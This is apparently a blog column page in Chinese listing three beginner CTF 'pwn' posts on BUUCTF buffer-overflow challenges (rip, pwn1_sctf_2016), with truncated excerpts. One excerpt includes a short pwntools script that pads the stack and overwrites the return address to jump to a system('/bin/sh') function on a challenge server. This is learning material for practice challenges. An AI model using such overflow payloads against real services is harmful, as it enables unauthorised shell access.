pwn
文章平均质量分 64
brightendavid
啥都会,啥都想学
展开
-
PWN (3) pwn1_sctf_2016 1
查找字符串,发现了一个flag.txt。 输入在这里 限制为32长度的输入原创 2021-05-11 19:44:07 · 446 阅读 · 0 评论 -
pwn(2) 愚人发现了pwn的有趣之处 对于填充大小的研究
#python3 from pwn import * p = remote('node3.buuoj.cn', '25822') payload = b'b' * (0x40+8)+ p64(0x40060D) p.sendline(payload) p.interactive() 抄了几个wp,一直很奇怪为什么这个填充的字符数量为什么规则不一样。 比如上面的填充规则是输入的字符大小+EBP大小 因为是64位的系统所以EBP大小是8,而前面的0x40是64位,也就是此处输入的字符大小。 后面原创 2021-05-09 14:41:52 · 259 阅读 · 0 评论 -
BUUCTF-rip 尝试PWN入门
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安原创 2021-05-04 00:12:24 · 1457 阅读 · 3 评论